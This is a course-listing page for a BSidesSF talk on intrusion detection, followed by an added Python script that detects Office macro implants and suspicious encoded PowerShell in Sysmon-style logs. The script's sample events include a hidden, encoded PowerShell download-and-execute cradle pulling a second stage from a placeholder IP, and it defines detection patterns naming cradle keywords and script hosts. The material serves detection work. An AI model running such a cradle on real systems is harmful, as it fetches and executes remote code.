Building an Effective Intrusion Detection Program

Security BSides San Francisco via YouTube

Overview

Explore effective intrusion detection strategies in this BSidesSF 2017 conference talk. Learn how to build a robust detection program from affordable or free tools, covering cloud applications, endpoints, and network security monitoring. Modern breaches often go undetected for extended periods; the talk compares recent high-profile incidents and discusses methods for detecting them in a timely way. Gain insights into logging practices (log everything), Network Security Monitoring (NSM), and platform-specific tooling for Mac and Windows environments. Work through real-world examples: cloud login logging for Google and Dropbox, detecting Windows Office macro implants and malicious PowerShell, investigating Mac implants with osquery and Santa, and network monitoring with Bro. The talk closes with crowd-sourced incident response techniques that strengthen an organization's security posture.
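
The overview names two of the talk's Windows examples, Office macro implants and PowerShell. As an added illustration of the kind of detection such a program runs over endpoint logs (this is not code from the talk, its speaker, or Class Central), the Python below checks constructed Sysmon-style process-creation events: it flags Office applications spawning a script host and decodes any -EncodedCommand payload so an analyst sees the command that actually ran. The field names, the sample events, the indicator lists and the rule names are assumptions chosen for this example.

```python
"""Added example: Office-macro implant and suspicious-PowerShell detection over
Windows process-creation telemetry. Not code from the BSidesSF talk.

Field names follow Sysmon Event ID 1 (ProcessCreate) conventions: UtcTime,
Image, ParentImage, CommandLine. The sample events below are constructed.
"""
import base64
import json
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Macro-capable Office binaries (parents) and the interpreters/LOLBins a macro
# typically launches (children). Indicator lists are assumptions for the example.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Download-and-execute cradle markers, checked against the decoded command when one exists.
CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                    r"invoke-expression|\biex\b|net\.webclient|frombase64string")


@dataclass
class Finding:
    time: str
    rule: str
    detail: str
    decoded: Optional[str] = None


def image_name(path: str) -> str:
    """Lower-cased file name from a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_ps(command: str) -> str:
    """How -EncodedCommand payloads are built: UTF-16LE text, then base64."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Reverse of encode_ps; None if the blob is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _switch(tok: str) -> Optional[str]:
    """Switch name if tok looks like a powershell.exe switch (-name or /name)."""
    return tok[1:].lower() if len(tok) > 1 and tok[0] in "-/" and tok[1:].isalpha() else None


def encoded_payload(cmdline: str) -> Optional[str]:
    """Return the -EncodedCommand argument. powershell.exe accepts any unambiguous
    prefix of a switch, so -e, -ec, -en, -enc ... all mean -EncodedCommand, while
    -ex is -ExecutionPolicy and must not match."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        name = _switch(tok)
        if name and (name == "ec" or (name.startswith("e") and "encodedcommand".startswith(name))):
            return toks[i + 1]
    return None


def ps_evasion_flags(cmdline: str) -> List[str]:
    """Switches that interactive use rarely combines: hidden window, profile
    suppression, execution-policy bypass (prefix-matched as powershell.exe does)."""
    toks, flags = cmdline.split(), []
    for i, tok in enumerate(toks):
        name = _switch(tok)
        if not name:
            continue
        nxt = toks[i + 1].lower() if i + 1 < len(toks) else ""
        if name.startswith("w") and "windowstyle".startswith(name) and nxt.startswith("hid"):
            flags.append("hidden window")
        elif name.startswith("nop") and "noprofile".startswith(name):
            flags.append("no profile")
        elif name.startswith("ex") and "executionpolicy".startswith(name) and nxt in ("bypass", "unrestricted"):
            flags.append("execution policy " + nxt)
    return flags


def analyse(json_lines: Iterable[str]) -> List[Finding]:
    """Run both rules over JSON-per-line process-creation events."""
    findings: List[Finding] = []
    for line in json_lines:
        ev = json.loads(line)
        parent, child, cmd = image_name(ev["ParentImage"]), image_name(ev["Image"]), ev["CommandLine"]
        # Rule 1: the macro tell-tale. Word/Excel have no business launching an interpreter.
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            findings.append(Finding(ev["UtcTime"], "office_spawns_script_host", f"{parent} -> {child}: {cmd}"))
        # Rule 2: PowerShell launches worth an analyst's eyes, with the payload decoded.
        if child in POWERSHELL:
            flags = ps_evasion_flags(cmd)
            blob = encoded_payload(cmd)
            decoded = decode_ps(blob) if blob else None
            if blob:
                flags.append("encoded command" if decoded is not None else "undecodable -EncodedCommand blob")
            m = CRADLE.search(decoded if decoded is not None else cmd)
            if m:
                flags.append(f"download/execute cradle ({m.group(0)})")
            if flags:
                findings.append(Finding(ev["UtcTime"], "powershell_needs_review", "; ".join(flags), decoded))
    return findings


# Constructed sample telemetry (not real logs): one JSON object per line, as a SIEM would emit.
_CRADLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2')"
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"UtcTime": "2017-02-12 09:14:01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docm"'},
    {"UtcTime": "2017-02-12 09:14:03", "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {encode_ps(_CRADLE_CMD)}"},
    {"UtcTime": "2017-02-12 09:20:45", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"},
    {"UtcTime": "2017-02-12 10:02:17", "ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //B C:\Users\alice\AppData\Local\Temp\report.vbs"},
    {"UtcTime": "2017-02-12 11:30:00", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoProfile -NonInteractive -EncodedCommand {encode_ps('Get-Date')}"},
]]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"{f.time}  {f.rule:26} {f.detail}")
        if f.decoded:
            print(f"{'':20}decoded: {f.decoded}")
```

Run stand-alone, the script reports the Word-spawned PowerShell twice (once for the parent/child pair, once for the hidden, encoded, cradle-bearing command line, decoded), the Excel-spawned wscript once, and the services.exe-launched encoded PowerShell once with its harmless decoded "Get-Date" for review; the scheduled backup from cmd.exe and the benign Word launch produce nothing. The point a program like the one in the talk relies on is that parent/child relationships and decoded arguments, not process names alone, are what separate a macro implant from routine administration.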

Syllabus

Intro
Assumptions
Social stuff: Be nice.
Tool talk: Logging
Re: Logging: Log everything
Tool talk: NSM
Tool talk: Macs
Tool talk: Windows
Examples: Cloud logging. Google logins.
Examples: Cloud logging. Dropbox logins. Example query
Dropbox logins cont.
Examples: Windows Office Macro Implants
Skip a few steps...
End result
Examples: Windows PowerShell
Windows PS cont.
Examples: Mac implants w/osquery
Mac & osquery cont. (edited for readability)
Examples: Mac implants w/Santa
Examples: Network monitoring. Bro FTW
Q&A Questions? Comments?

Taught by

Security BSides San Francisco
